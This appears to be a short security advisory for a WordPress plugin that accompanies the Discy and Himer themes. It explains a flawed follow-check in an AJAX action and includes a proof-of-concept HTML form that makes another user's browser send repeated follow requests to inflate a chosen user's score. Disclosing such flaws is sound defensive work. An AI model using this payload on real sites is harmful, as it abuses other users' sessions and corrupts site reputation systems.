The plugin (which is a companion plugin used with Discy and Himer themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpqa_following_you">
<!-- change the following value to the user id of the user you wish to reward! -->
<input type="hidden" name="following_var_id" value="2">
<!-- Version 5.9.1 checks nonce, replace with the correct one for the user submitting the form. -->
<input type="hidden" name="following_nonce" value="1234567890">
<input type="submit" value="Get rich!">
</form>